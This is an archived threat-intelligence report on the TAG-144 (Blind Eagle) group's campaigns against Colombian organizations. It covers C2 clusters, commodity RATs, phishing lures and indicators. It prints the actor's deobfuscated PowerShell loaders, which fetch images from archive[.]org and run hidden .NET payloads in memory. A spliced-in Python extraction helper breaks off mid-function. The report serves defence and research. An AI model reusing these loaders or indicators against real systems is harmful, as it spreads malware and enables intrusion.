{
	"id": "aaea6a0e-b9ff-430d-a35c-e05d48d1d882",
	"created_at": "2026-04-06T01:32:23.220122Z",
	"updated_at": "2026-04-10T13:12:29.680059Z",
	"deleted_at": null,
	"sha1_hash": "ba28e9414078c889952e5f33706d74ff2e7184f9",
	"title": "TAG-144’s Persistent Grip on South American Organizations",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 7085977,
	"plain_text": "TAG-144’s Persistent Grip on South American Organizations\r\nBy Insikt Group®\r\nArchived: 2026-04-06 00:48:23 UTC\r\nNote: The analysis cut-off date for this report was July 21, 2025.\r\nExecutive Summary\r\nInsikt Group has identified five distinct activity clusters linked to TAG-144 (also known as Blind Eagle). These clusters\r\nhave operated at various times throughout 2024 and 2025, targeting a significant number of victims, primarily within the\r\nColombian government across local, municipal, and federal levels. Although the clusters share similar tactics, techniques,\r\nand procedures (TTPs) such as leveraging open-source and cracked remote access trojans (RATs), dynamic domain\r\nproviders, and legitimate internet services (LIS) for staging, they differ significantly in infrastructure, malware deployment,\r\nand other operational methods. Insikt Group also found further evidence linking TAG-144 to Red Akodon and identified\r\nvarious compromised Colombian government email accounts likely used in spearphishing campaigns.\r\nTo protect against TAG-144, security defenders should block IP addresses and domains tied to associated RATs, flag and\r\npotentially block connections to unusual LIS, and deploy updated detection rules (YARA, Sigma, Snort) for current and\r\nhistoric infections. Other controls include implementing email filtering and data exfiltration monitoring. See the Mitigations\r\nsection for implementation guidance and Appendix B for a complete list of IoCs. 
In the long term, analysts should\r\ncontinuously monitor the cybercriminal ecosystem for emerging threats and adapt controls accordingly.\r\nKey Findings\r\nInsikt Group has tracked five distinct activity clusters associated with TAG-144 (Blind Eagle), each displaying\r\noverlapping yet varied TTPs and collectively targeting numerous victims, primarily within the Colombian\r\ngovernment, throughout 2024 and 2025.\r\nTAG-144 appears to maintain an extensive operational infrastructure, comprising virtual private servers (VPS), IP\r\naddresses within Colombian ISP ranges, and servers that appear to function as VPN servers. These typically host\r\ndomains registered through various dynamic DNS services such as duckdns[.]org, noip[.]com, and con-ip[.]com,\r\namong others.\r\nTAG-144 has employed a wide array of open-source and cracked RATs, including AsyncRAT, DcRAT, REMCOS\r\nRAT, XWorm, and LimeRAT, among others. These payloads are typically deployed through a multi-stage infection\r\nchain that leverages an expanding set of LIS and uses steganography to obscure malicious content and evade\r\ndetection.\r\nBackground\r\nTAG-144, also known as Blind Eagle, AguilaCiega, APT-C-36, and APT-Q-98, is a threat group that has been active since at\r\nleast 2018, primarily targeting South America, especially Colombia. While the threat group’s overall motivation remains\r\nambiguous, its activity reflects both cyber-espionage and financially driven motivations. 
TAG-144’s primary focus appears\r\nto be on credential theft, evidenced by banking-related keylogging and browser monitoring, alongside indications of\r\nespionage, such as persistently targeting government entities and using modified RATs with surveillance functions (1, 2).\r\nThe group’s primary targets include government institutions, especially judiciary and tax authorities, alongside financial\r\nentities, petroleum and energy companies, and organizations within the education, healthcare, manufacturing, and\r\nprofessional services sectors (1, 2). Operations are mainly focused on Colombia, with additional activity in Ecuador, Chile,\r\nand Panama, and occasional campaigns in North America targeting Spanish-speaking users.\r\nInitial access typically occurs through spearphishing campaigns impersonating local government agencies, most notably\r\nColombian authorities. These campaigns leverage themes such as debt collection and judicial notifications to lure victims\r\ninto opening malicious documents (1, 2). They have often used URL shorteners like cort[.]as, acortaurl[.]com, and gtly[.]to\r\nto conceal malicious links and target users geographically. TAG-144 employs geo-fencing and other detection evasion\r\nmeasures that block access from outside Colombia or Ecuador, redirecting outsiders to official government websites. TAG-144 has consistently leveraged compromised email accounts in its spearphishing campaigns, including those associated with\r\ngovernment entities and private individuals.\r\nTAG-144 leverages a range of commodity remote access trojans (RATs), including AsyncRAT, REMCOS RAT, DcRAT,\r\nnjRAT, LimeRAT, QuasarRAT, BitRAT, and a Quasar variant known as BlotchyQuasar. Its tooling also involves crypters\r\nsuch as HeartCrypt, PureCrypter, and those developed by threat actors like “Roda” and “pjoao1578”, with indicators\r\npointing to the use of crypter-as-a-service offerings such as CryptersAndTools, which originates from Brazil. 
Additionally, it\r\nemploys steganography techniques, embedding malicious payloads within image files to evade detection.\r\nhttps://www.recordedfuture.com/research/tag-144s-persistent-grip-on-south-american-organizations\r\nPage 1 of 34\n\nTAG-144’s command-and-control (C2) infrastructure often incorporates IP addresses from Colombian ISPs alongside virtual\r\nprivate servers (VPS) such as Proton666 and VPN services like Powerhouse Management, FrootVPN, and TorGuard (1, 2).\r\nThis setup is further enhanced by the use of dynamic DNS services, including duckdns[.]org, ip-ddns[.]com, and\r\nnoip[.]com. The threat group is suspected, though not definitively confirmed, to use compromised routers, which are then\r\nrepurposed as reverse proxies to obscure the true locations of their C2 servers and complicate attribution.\r\nThe threat group has consistently leveraged LIS, particularly during the payload staging phase. These services include\r\nwidely used platforms like Bitbucket, Discord, Dropbox, GitHub, Google Drive, Paste.ee, and lesser-known platforms such\r\nas undisclosed Brazilian image-hosting websites. Additionally, the group has been observed using compromised accounts to\r\nhost malicious content, including a Google Drive folder tied to a compromised account associated with a regional\r\nColombian government organization.\r\nThe threat group's origin remains uncertain, though multiple studies suggest it operates within the UTC-5 or UTC-4 time\r\nzones (1, 2), consistent with countries like Colombia and Ecuador, with some research specifically pointing to Colombia as\r\nits base. Notably, technical artifacts have contained both Spanish- and Portuguese-language comments. The Spanish\r\nobserved in the comments closely resembles the regional dialects commonly spoken in the targeted countries. 
Additionally,\r\nthe threat group has been observed using tools and services tied to the Brazilian cybercriminal underground, indicating a\r\npossible connection with Brazilian threat actors.\r\nThree key factors set TAG-144 apart within the cybercriminal ecosystem. First, while globalization, cybercriminal\r\ncollaboration, and hardware/software standardization have lowered barriers for threat actors to operate globally, threat\r\nactors, including TAG-144, often remain regionally focused due to cultural nuances, tacit knowledge, and persistence.\r\nSecond, despite some tooling improvements, TAG-144 has largely relied on consistent techniques since its emergence. Their\r\ncontinued success, reflected in a high number of victims, underscores how well-established methods remain effective over\r\ntime. Lastly, TAG-144 exemplifies the increasingly blurred lines between cybercrime and espionage, a trend that has\r\nbecome more prominent in the coming year. In this context, a comprehensive approach to tackling cyber threats becomes\r\neven more crucial, requiring improved defenses, deeper regional knowledge, and enhanced coordination.\r\nThreat Analysis\r\nInsikt Group identified five activity clusters associated with TAG-144 that were active between May 2024 and July 2025\r\n(see Figure 1). Activity periods were determined based on domain resolutions, sample submissions, and victim traffic, as\r\nobserved through Recorded Future® Network Intelligence.\r\nFigure 1: Cluster activity timelines (Source: Recorded Future)\r\nThe following clusters have been observed:\r\nCluster 1, active from February through July 2025, comprises C2 IPs primarily associated with TorGuard VPN and\r\none Colombian ISP hosting duckdns[.]org and, starting in July 2025, noip[.]com domains with static resolution and\r\nminimal rotation. 
Cluster 1 is linked to DcRAT, AsyncRAT, and REMCOS RAT infections targeting Colombian\r\ngovernment entities exclusively.\r\nCluster 2, active between September and December 2024, included C2 IPs tied to AS-COLOCROSSING,\r\nColombian ISPs, and VULTR hosting duckdns[.]org, con-ip[.]com, and kozow[.]com domains. Cluster 2 is\r\nassociated with AsyncRAT activity targeting the Colombian government and entities in the education, defense, and\r\nretail sectors.\r\nCluster 3, active from September 2024 to July 2025, consists of C2 IPs linked to Colombian ISP UNE EPM hosting\r\nduckdns[.]org and, occasionally, con-ip[.]com domains. Cluster 3 is associated with both AsyncRAT and REMCOS\r\nRAT deployments.\r\nCluster 4, active from May 2024 to February 2025, is notable for combining malware and phishing infrastructure\r\nattributed to TAG-144.\r\nCluster 5, active from March to July 2025, consists of C2 IPs linked to GLESYS (AS42708) hosting dynamically\r\nresolving duckdns[.]org domains. Cluster 5 is associated with LimeRAT and a cracked AsyncRAT variant seen in\r\nClusters 1 and 2.\r\nInsikt Group identified infrastructure overlaps between the clusters, establishing a connection among them. Additionally, the\r\nclusters share notable similarities in TTPs, including infrastructure choices, domain naming patterns, malware deployment,\r\nand the abuse of LIS. However, each cluster also exhibits distinct differences, which are explored in detail in the following\r\nsections of this report.\r\nCluster 1\r\nInfrastructure Analysis\r\nCluster 1, active from at least February through July 2025, comprises C2 IP addresses primarily linked to TorGuard VPN\r\nservers and, in one case, a Colombian ISP. 
This cluster typically hosts duckdns[.]org and, more recently, noip[.]com\r\ndomains with specific naming patterns; it has also been observed deploying DcRAT, AsyncRAT, and REMCOS RAT. The IP\r\naddresses linked to Cluster 1 are listed in Appendix A. The domains consistently resolve to the same static IP addresses over\r\ntime, with minimal rotation observed within Cluster 1.\r\nThe subdomain names, likely generated by a domain generation algorithm (DGA), commonly include the word “envio”\r\nfollowed by a numeric part, as in, for example, envio16-05[.]duckdns[.]org. The names are detectable via the regex in\r\nFigure 2 and are detailed in Appendix B.\r\nenvio[0-9\\-]{2,5}\\.duckdns\\.org\r\nFigure 2: Regex for suspected DGA linked to Cluster 1 (Source: Recorded Future)\r\nWhile prior research has suggested that the TorGuard VPN servers associated with Cluster 1 are used for port forwarding,\r\nthe exposure of C2 components, such as default transport layer security (TLS) certificates tied to deployed malware\r\nfamilies, indicates these IP addresses are likely dedicated VPN instances directly controlled by TAG-144.\r\nIn addition to the TorGuard VPN servers, Cluster 1 includes IP addresses associated with Colombian ISPs, such as\r\nColombia’s primary provider, COLOMBIA TELECOMUNICACIONES S.A. E.S.P. While earlier reporting on Blind Eagle\r\nin 2020 suggested the possible use of compromised routers for C2 infrastructure, Insikt Group has not confirmed such\r\nactivity for the observed IP addresses.\r\nNotably, several domains hosted on TorGuard VPN servers listed in Appendix A were previously resolved to IP addresses\r\nbelonging to Colombian ISPs, such as trabajonuevos[.]duckdns[.]org. These IP addresses and their associated domains are\r\ndetailed in Appendix A. 
Similarly, certain domains, such as diazpool14[.]duckdns[.]org, were previously hosted on IP\r\naddresses linked to GLESYS (AS42708), an ASN identified in association with Cluster 5.\r\nAbuse of Legitimate Internet Services, Including lovestoblog[.]com\r\nAs is typical for TAG-144, Cluster 1 has leveraged various LIS during staging, such as Tagbox, Archive, Paste.ee, Discord,\r\nand BitBucket, and for the first time in TAG-144 activity, the free hosting platform lovestoblog[.]com by InfinityFree. More\r\nspecifically, the subdomain sudo102[.]lovestoblog[.]com hosted several text files that loaded an encoded PowerShell script,\r\nwhich retrieved the next stage of the infection chain from a JPG image hosted on archive[.]org. (See Figure 3 for the\r\ninfection chain; line breaks were added for readability.)\r\n$craploads = 'SilentlyContinue'\r\n$islamist = 'https://archive[.]org/download/new_image_20250531_1942/new_image.jpg'\r\n$seiche = New-Object System.Net.WebClient\r\n$seiche.Headers.Add('User-Agent', 'Mozilla/5.0')\r\n[byte[]]$homophobes = $seiche.DownloadData($islamist)\r\n$rythmic = [System.Text.Encoding]::UTF8.GetString($homophobes)\r\n$protamphirhine = 'INICIO\u003e\u003e'\r\n$unrubberized = '\u003c\u003cFIM\u003e\u003e'\r\n$petrograph = $ither\r\n$formylation = $rythmic.IndexOf($protamphirhine)\r\n$inconveniency = $rythmic.IndexOf($unrubberized)\r\nif ($formylation -ne -1 -and $inconveniency -ne -1 -and $inconveniency -gt $formylation) {\r\n $formylation += $protamphirhine.Length\r\n $petrograph = $rythmic.Substring($formylation, $inconveniency - $formylation)\r\n}\r\n$higgsinos = '#x#.e13ba2379fd20168b9c460418b963234_oviuqra/moc.golbo#sevol.201odus//:p##h'\r\n$higgsinos = $higgsinos.Replace('#', 't')\r\n$petrograph = $petrograph.Replace('@', 'A')\r\n$MacArthur = [System.Convert]::FromBase64String($petrograph)\r\n$aginator = 
[Reflection.Assembly]::Load($MacArthur)\r\n$towelette = [dnlib.IO.Home].GetMethod('VAI').Invoke(\r\n $ither,\r\n [object[]]@(\r\n $higgsinos,\r\n '', '', '',\r\n 'MSBuild', '', '', '', '',\r\n 'C:\\Users\\Public\\Downloads',\r\n 'Mattagami',\r\n 'js', '', '',\r\n 'duparted',\r\n '2', ''\r\n )\r\n)\r\nFigure 3: Payload hosted on archive[.]org URL (Source: Recorded Future)\r\nAt least one text file hosted on sudo102[.]lovestoblog[.]com included comments in Portuguese (for example, “Junta os\r\ncomandos,” which translates to “Add the commands”), a characteristic previously observed in connection with Blind Eagle\r\n(1, 2). This was suspected to indicate possible collaboration between the threat actor and external threat groups; however, it\r\ncould also be explained by the presence of Portuguese-speaking members, code reuse, or intentional false flag operations.\r\nMalware\r\nInsikt Group observed Cluster 1 using both the “1.0.7” version of AsyncRAT and a variant labeled “CRACKED BY\r\nhxxps://t[.]me/xworm_v2”, which has the mutex AsyncMutex_6SI8OkPnk. xworm_v2 is an active Telegram channel with\r\nover 300 members, known for sharing and distributing cracked versions of paid software.\r\nFigure 4: Telegram channel hxxps://t[.]me/xworm_v2 (Source: Recorded Future)\r\nThe cracked version observed in connection with TAG-144 was linked to a threat actor tracked as Red Akodon in May 2024;\r\nit appeared again in June 2025 in a report potentially referencing the same threat actor based on observed TTPs, though\r\nwithout formal attribution.\r\nVictimology\r\nUsing Recorded Future Network Intelligence, Insikt Group identified a significant number of victims exclusively linked to\r\nthe Colombian government associated with Cluster 1 (see Appendix C). 
Network communications, as observed by\r\nRecorded Future Network Intelligence, began in March 2025 and ended in June 2025. Notably, the cessation of activity may\r\nindicate that the threat actors were either evicted, completed their objectives and withdrew voluntarily, or transitioned to\r\nother tooling and egress points.\r\nAs shown in Appendix C, multiple victims were observed communicating with several C2 servers associated with Cluster\r\n1. This activity likely resulted from changes in DNS resolution for the C2 domains over time. In some instances, Insikt\r\nGroup assesses that multiple infections occurred within the same victim network, with all compromised systems\r\ncommunicating with the C2 infrastructure through a shared egress point. In some cases, Insikt Group was unable to\r\nconclusively identify the exact victim due to multiple entities sharing the same name.\r\nInfrastructure Management\r\nAlthough the exact infrastructure management methods used by TAG-144 for Cluster 1 remain unclear at this time, Insikt\r\nGroup identified indications that the threat group may have leveraged a compromised Mikrotik router as a proxy to\r\ncommunicate with the C2 servers over a port.\r\nCluster 2\r\nInfrastructure Analysis\r\nCluster 2, active from at least September to December 2024, comprises C2 IP addresses primarily linked to AS-COLOCROSSING, Colombian ISP IP addresses, and, in at least one case, VULTR. It typically hosts duckdns[.]org or con-ip[.]com domains with specific naming patterns and has been observed deploying AsyncRAT. In a few cases, Insikt Group\r\nalso observed domains linked to the free dynamic DNS provider kozow[.]com. The IP addresses linked to Cluster 2 are listed\r\nin Appendix D.\r\nThe subdomain names, likely generated by a DGA, often consist of Spanish words, as in\r\npesosdepesoslibras[.]duckdns[.]org. 
Sometimes, they are followed by numbers, as in paseoencarro2024[.]con-ip[.]com.\r\n(For a detailed list of these subdomain names, see Appendix A.) Notably, many of the domains currently hosted on AS-COLOCROSSING IP addresses (see Appendix D) were previously associated with IPs from Colombian ISPs, such as\r\n179[.]14[.]8[.]26, 181[.]131[.]217[.]255, 177[.]255[.]84[.]82, and 191[.]88[.]248[.]162, indicating they may have been\r\nreused across different hosting infrastructures.\r\nIn addition to the Spanish-themed domains, Insikt Group identified a large set of DuckDNS and CON-IP domains, likely\r\ngenerated by another DGA and all starting with the keyword “deadpoolstart,” followed by a four-digit number\r\n(see Appendix E). Notably, the con-ip[.]com domains resolve to the AS-COLOCROSSING IP address 64[.]188[.]9[.]172,\r\nwhile the duckdns[.]org domains all resolve to IP addresses belonging to Colombian ISPs.\r\nAbuse of Legitimate Internet Services\r\nSimilar to Cluster 1, Cluster 2 has also been observed leveraging various LIS during staging, including GitHub, Archive,\r\nPaste.ee, and more recently, the free hosting platform lovestoblog[.]com by InfinityFree, which ultimately led to an XWorm\r\ninfection using the C2 domain deadpoolstart2064[.]duckdns[.]org.\r\nInsikt Group also identified a payload named RELACIÓN DE SALDOS - CUENTA DE COBRO.pdf.exe associated with Cluster 2,\r\nwhich staged its content via two GitHub Gist URLs linked to the account SmikeY666:\r\nhxxps://gist[.]githubusercontent[.]com/SmikeY666/50447c53097f8884ffc754a8779fa2a3/raw\r\nhxxps://gist[.]githubusercontent[.]com/SmikeY666/8504274482e8e688d9489b302bfbc45e/raw\r\nThe payload results in an AsyncRAT infection, with the malware reaching out to its C2 server,\r\ncococovid202420242024[.]duckdns[.]org, which resolved to IP address 64[.]188[.]9[.]175 as of December 26, 2024.\r\nNotably, the GitHub account “SmikeY666” included a link to a 2024 Vimeo video demonstrating an allegedly 
cracked\r\nversion of SilverRAT, a Windows-based RAT that first appeared in 2023. It has been distributed across various forums and\r\nappears to be developed by an individual or group using the alias Anonymous Arabic.\r\nMalware\r\nInsikt Group observed Cluster 2 using the AsyncRAT variant labeled “CRACKED BY hxxps://t[.]me/xworm_v2” with the\r\nmutex AsyncMutex_6SI8OkPnk. Additionally, the cluster deployed AsyncRAT samples featuring custom mutexes such as\r\ntempcookieess, tempcokies, tempcookiee, WinCookies, Cookies, and CookiesGoogleChrome, among others. These\r\nsamples can be tracked via Recorded Future Malware Intelligence. At least some of the samples are encrypted using a\r\ncrypter attributed to Roda, a tool associated with Blind Eagle activity.\r\nVictimology\r\nUsing Recorded Future Network Intelligence, Insikt Group identified nine victims associated with Cluster 2, primarily\r\nlinked to Colombian government entities, along with victims from the education, defense, and retail sectors, among others\r\n(see Appendix F). Network communications observed by Recorded Future began in early October 2024 and ended in\r\nDecember 2024.\r\nAs with Cluster 1, multiple infections were observed within some of the victim organizations linked to Cluster 2, suggesting\r\nbroader targeting or possible lateral movement. There is also evidence of victim overlap between Clusters 1 and 2.\r\nFurthermore, based on high volumes of network traffic from Colombian ISP IP addresses to C2 ports during the relevant\r\ntimeframes, the actual number of victims is likely higher than what has been confirmed.\r\nCluster 3\r\nCluster 3, active from at least September 2024 to July 2025, comprises C2 IP addresses primarily linked to the Colombian\r\nISP UNE EPM, typically hosting DuckDNS or, in rare cases, con-ip[.]com domains. Insikt Group has observed AsyncRAT\r\nas well as REMCOS RAT infections linked to Cluster 3. 
The IP addresses linked to Cluster 3 are listed in Appendix G.\r\nThe subdomain names, likely generated using a DGA, often incorporate Spanish names, as in\r\nsebastiancorrea905040[.]duckdns[.]org, sometimes appended with numerical sequences. (For a detailed list of these\r\nsubdomain names, see Appendix B.) Notably, one of the domains associated with Cluster 3, sebastianguerrero5040[.]con-ip[.]com, was observed resolving to the Cluster 2 IP address 64[.]188[.]9[.]177 between at least September 11 and\r\nNovember 11, 2024.\r\nSimilar to Clusters 1 and 2, Cluster 3 has also been observed abusing multiple LIS, including Tagbox, Archive, and Paste.ee,\r\namong others.\r\nCluster 4\r\nCluster 4, active from at least May 2024 to February 2025, differs from the others in that it is not only associated with\r\nmalware infrastructure but also with phishing activity attributed to TAG-144. The IP addresses linked to Cluster 4 are listed\r\nin Appendix H. The full list of domains linked to the IP addresses in Appendix H is listed in Appendix A.\nThe phishing pages linked to Cluster 4 have been observed impersonating multiple banks, including Banco Davivienda,\nBancolombia, and BBVA (see Figure 5). Notably, these lures differ from earlier ones attributed to TAG-144, which\nprimarily impersonated government entities such as tax authorities or judicial bodies. Previous campaigns also appeared to\ntarget government-affiliated individuals or organizations, as evidenced by the victims associated with Clusters 1 and 2.\nFigure 5: Phishing pages linked to Cluster 4 (Source: URLScan, URLScan, URLScan)\nNotably, a phishing page impersonating BBVA and hosted on the domain keepz[.]duckdns[.]org contained the IP address\n181[.]131[.]217[.]139 in its document object model (DOM), as seen in Figure 6. 
This IP was hosting the domains\nenv2023nue[.]duckdns[.]org and chichichi01[.]duckdns[.]org in 2023. The domain env2023nue[.]duckdns[.]org was\npublicly linked to APT-C-36 (Blind Eagle) and likely remained in use by the same threat actor, as it continued to host an\nopen directory containing folders related to Banco Davivienda, Banco Colombia, Banco Caja Social, and others until at least\nMarch 14, 2024, while being hosted on IP address 179[.]14[.]9[.]152. The domain chichichi01[.]duckdns[.]org served as a\nC2 domain for AsyncRAT based on public reporting and was also hosted on IP address 179[.]14[.]9[.]152 between March\n22 and May 8, 2024.\n…\n\nDirección IP: 181[.]131[.]217[.]139\n\nCopyright©2023 Bancolombia S.A.\n\n…\nFigure 6: IP address left in the DOM of a phishing page (Source: URLScan)\nCluster 5\nCluster 5, active from at least March to July 2025, comprises C2 IP addresses primarily linked to GLESYS\n(AS42708), typically hosting duckdns[.]org domains. The domains linked to Cluster 5 are listed in Appendix I. Cluster 5 is\nthe only cluster associated with the deployment of LimeRAT, which in this case uses the mutex 1e97ead369. The\nAsyncRAT variant linked to Cluster 5 is the same cracked version identified in Clusters 1 and 2. Of note, the domains\nfrequently resolve to changing IP addresses, with those observed by Insikt Group detailed in Appendix B.\nSimilar to the other clusters, Cluster 5 has also been observed leveraging various LIS during staging, including Archive,\nPaste.ee, and Tagbox.\nInfection Chain\nPhishing Email\nInsikt Group identified an email sent to undisclosed recipients from a likely compromised email address, alcaldia[@]simacota-santander[.]gov[.]co, associated with the Mayor’s Office of Simacota in the Santander department of Colombia. 
Infections\nstemming from this email have been confirmed to result in AsyncRAT deployment, communicating with the C2 domain\nenvio01[.]ddns[.]net, a domain previously linked to Cluster 1.\nFrom: Alcaldía Simacota Santander \u003cREDACTED\u003e\r\nSent: Tuesday, July 1, 2025 3:23 p.m.\r\nTo: undisclosed-recipients:\r\nSubject: Charge for late-payment interest – Filing No. 11001-28-05-03004\r\nWarning! This email comes from an external user; do not open attachments or click on links without validating that the sender and the content\r\nEnforcement proceedings are being initiated for interest accrued due to late payment.\r\nSee the attached file for the detailed settlement.\r\nSincerely,\r\nFigure 7: Text in phishing email linked to TAG-144 (left) and the English translation (right) (Source: Recorded Future)\r\nSVG Attachment\r\nThe email included an attachment named\r\nNotificacion_electronica_sentencia_preliminar_Departamento_Juridico_sxyebfiv.svg, which has a SHA256 hash of\r\n04878a5889e3368c2cf093d42006ba18a87c5054f1464900094e6864f4919899. A translated version of the attachment is\r\npresented in Figure 8, while the original Spanish version is available in Appendix J. 
The SVG content claims that a judicial\r\nprocess has been initiated against the recipient, outlines potential penalties, and contains a link purportedly leading to\r\nevidence and further legal details.\r\nFigure 8: Translated SVG file sent via spearphishing email (Source: Recorded Future)\r\nStaging Process Using LIS\r\nThe link embedded within the SVG file is:\r\nhxxps://cdn[.]discordapp[.]com/attachments/1389692690454548634/1389692792590307338/Notificacion_electronica_sentencia_preliminar_Departame\r\nJusticia_01.js?\r\nex=68658bc4\u0026is=68643a44\u0026hm=057a0e76212bdd4c2da95e51ac7542f60ecbd440482ee186d474e1d783afd288\u0026?\r\nid=75e6ea37-63e5-491a-a5e2-ad4c92667144\r\nA similar SVG sample was identified through a Malware Intelligence search for HTTP requests to cdn[.]discordapp[.]com\r\nthat included “Notificacion” in the query string (see Figure 9).\r\nFigure 9: Additional sample found in Recorded Future Malware Intelligence (Source: Recorded Future)\r\nAlthough the cdn[.]discordapp[.]com link was inactive at the time of analysis, Insikt Group successfully extracted the\r\ndownloaded JavaScript file from a PCAP capture. The file, named\r\nNotificacion_electronica_sentencia_preliminar_Departamento_De-Justicia_01.js, has the SHA256 hash\r\n1226a8d066328a8b6f353c9d98f1dc8128bd84f3909ae1cc6811dc1adff33c81. The script contains a mix of malicious code\r\nand benign content related to the Microsoft Print Schema. The benign portion is displayed in Figure 10. The inclusion of\r\nbenign content is likely an attempt to evade detection.\r\nFigure 10: Benign code portion contained in the JavaScript script (Source: Recorded Future)\r\nObfuscation\r\nFigure 11 shows the obfuscated malicious portion of the script. 
Notably, the code contains comments written in Portuguese,\r\nan aspect previously discussed in this report and also associated with activity linked to TAG-144.\r\nFigure 11: Obfuscated malicious code portion contained in the JavaScript script (Source: Recorded Future)\r\nThe variables voicelessness, classe, unwellness, and isostasy are obfuscated using junk characters and later\r\ndeobfuscated via string replacement operations. These variables resolve to the following:\r\nvoicelessness and classe: MSXML2.ServerXMLHTTP.6.0\r\nunwellness: hxxp://paste[.]ee/d/TrxwtHcC/0 (as observed via URLScan)\r\nisostasy: GET\r\nThe script creates a ServerXMLHTTP object and issues a GET request to the specified paste[.]ee URL using the custom\r\nUser-Agent MyCustomAgent/1.0. If the HTTP response returns a status code 200, the response body is executed as\r\nJavaScript.\r\nThe SHA256 hash of the response body is 591744244c7ca9cea69cde263187efde3f65a157f8e5eb885ccc1f9e078b5572. This\r\npayload contains similar string obfuscation techniques and ultimately reconstructs strings to instantiate a shell object and\r\nexecute a deobfuscated command line.\r\nFigure 12: Obfuscated payload with Portuguese comments (Source: Recorded Future)\r\nPowerShell Script\r\nThe deobfuscated command line is shown in Figure 13.\r\nFigure 13: Deobfuscated PowerShell command (Source: Recorded Future)\r\nThe executed command initiates PowerShell, decodes a Base64-encoded payload, and then runs the decoded content via the\r\nInvoke-Expression cmdlet. 
Figure 14 shows the deobfuscated string with line breaks added.\r\n$atropisomer = 'VkFJ';\r\n$pyrography = [System.Convert]::FromBase64String($atropisomer);\r\n$automaticities = [System.Text.Encoding]::UTF8.GetString($pyrography);\r\n$sycoma = 'Q2xhc3NMaWJyYXJ5MS5Ib21l';\r\n$repedation = [System.Convert]::Frombase64String($sycoma);\r\n$arboricultural = [System.Text.Encoding]::UTF8.GetString($repedation);\r\nAdd-Type -AssemblyName System.Drawing;\r\n$tormodont = 'https://archive[.]org/download/universe-1733359315202-8750/universe-1733359315202-8750.jpg';\r\n$sclere = New-Object System.Net.WebClient;\r\n$sclere.Headers.Add('User-Agent','Mozilla/5.0');\r\n$sorority = $sclere.DownloadData($tormodont);\r\n$backpack = [byte[]](0x42, 0x4D, 0x72, 0x6E, 0x37, 0x00, 0x00, 0x00, 0x00, 0x00, 0x36, 0x00, 0x00, 0x00, 0x28, 0x00, 0x00, 0x00, 0x64, 0x00, 0x00, 0x\r\n$energises = -1;\r\nfor ($scattered = 0; $scattered -le $sorority.Length - $backpack.Length; $scattered++) {\r\n $lipogenys = $true;\r\n for ($Phalanx = 0; $Phalanx -lt $backpack.Length; $Phalanx++) {\r\n if ($sorority[$scattered + $Phalanx] -ne $backpack[$Phalanx]) {\r\n $lipogenys = $Brunhild;\r\n break;\r\n }\r\n }\r\n if ($lipogenys) {\r\n $energises = $scattered;\r\n break;\r\n }\r\n}\r\nif ($energises -eq -1) { return }\r\n$splenoncus = $sorority[$energises..($sorority.Length - 1)];\r\n$varicelliform = New-Object IO.MemoryStream;\r\n$varicelliform.Write($splenoncus, 0, $splenoncus.Length);\r\n$varicelliform.Seek(0, 'Begin') | Out-Null;\r\n$Hippocrene = [Drawing.Bitmap]::FromStream($varicelliform);\r\n$Coreopsis = New-Object Collections.Generic.List[Byte];\r\nfor ($reusably = 0; $reusably -lt $Hippocrene.Height; $reusably++) {\r\n for ($digoxin = 0; $digoxin -lt $Hippocrene.Width; $digoxin++) {\r\n $cradlelike = $Hippocrene.GetPixel($digoxin, $reusably);\r\n $Coreopsis.Add($cradlelike.R);\r\n 
$Coreopsis.Add($cradlelike.G);\r\n $Coreopsis.Add($cradlelike.B);\r\n }\r\n}\r\n$bolsterers = [BitConverter]::ToInt32($Coreopsis.GetRange(0, 4).ToArray(), 0);\r\n$scoundreldom = $Coreopsis.GetRange(4, $bolsterers).ToArray();\r\n$flamers = [Convert]::ToBase64String($scoundreldom).Replace('A','@').Replace('@','A');\r\n$supinely = '==AMv4ET5l1aC1EVvQ2LlVmLlR3chB3LvoDc0RHa'.Replace('}|','t');\r\n$amaurotic = [Convert]::FromBase64String($flamers);\r\n$sycee = [Reflection.Assembly]::Load($amaurotic);\r\n$astatizer = @($supinely,'','','','MSBuild','','','','','C:\\Users\\Public\\Downloads','creels','js','','','backticks','2','');\r\n$sycee.GetType($arboricultural).GetMethod($automaticities).Invoke($snarl,$astatizer);\r\n$Hippocrene.Dispose();\r\n$varicelliform.Dispose();\r\nFigure 14: Deobfuscated string (Source: Recorded Future)\r\nThe PowerShell script retrieves a JPG image from hxxps://archive[.]org/download/universe-1733359315202-8750/universe-1733359315202-8750.jpg. It then applies a steganographic technique: it scans the downloaded bytes for a specific byte marker, parses the bitmap found at that position, and reads the bitmap’s pixel data to extract an embedded payload. The extracted content is a .NET assembly that the script\r\nloads directly into memory. 
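As an added example (not code from the report, and not the threat actor's loader), the following Python re-implements the extraction steps shown in Figure 14 so an analyst can recover the embedded assembly from a retrieved image for static analysis without executing the loader. It assumes, as the script does, that an uncompressed 24-bit BMP is embedded in the downloaded file and that the pixel stream starts with a 4-byte little-endian length. Where the loader matches one literal header byte string, this helper searches for any plausible BMP header (a generalization, flagged in the code). The sample image it builds is constructed test data, not the file hosted on archive[.]org.

```python
import struct
from typing import Optional

# Analyst-side re-implementation of the loader's extraction logic (added example, not the
# page's or the threat actor's code). The loader searches the downloaded file for an exact
# byte string that is the header of the embedded BMP ('BM', file size, reserved, pixel
# offset 0x36, DIB header size 0x28, width 0x64 ...). This helper generalizes that marker
# search to any plausible 24-bit BMP header (an assumption; the loader matches one literal).

BMP_HEADER_LEN = 54  # 14-byte file header + 40-byte BITMAPINFOHEADER


def find_bmp_offset(data: bytes) -> int:
    """Return the offset of the first plausible embedded 24-bit BMP, or -1 if none."""
    pos = 0
    while True:
        pos = data.find(b"BM", pos)
        if pos == -1 or pos + BMP_HEADER_LEN > len(data):
            return -1
        pixel_offset, dib_size, width, height, planes, bpp = struct.unpack_from(
            "<IIiiHH", data, pos + 10
        )
        if (pixel_offset == BMP_HEADER_LEN and dib_size == 40 and planes == 1
                and bpp == 24 and width > 0 and height != 0):
            return pos
        pos += 2  # a decoy 'BM' (e.g. inside JPEG data) is skipped


def bmp_pixels_rgb(bmp: bytes) -> bytes:
    """Return R,G,B bytes in GetPixel order (y = 0 is the top row, x left to right),
    the same order the loader's nested loops produce."""
    pixel_offset, dib_size, width, height, planes, bpp = struct.unpack_from("<IIiiHH", bmp, 10)
    if dib_size != 40 or bpp != 24:
        raise ValueError("only uncompressed 24-bit BMPs are handled")
    bottom_up = height > 0             # positive height: rows are stored bottom-up
    height = abs(height)
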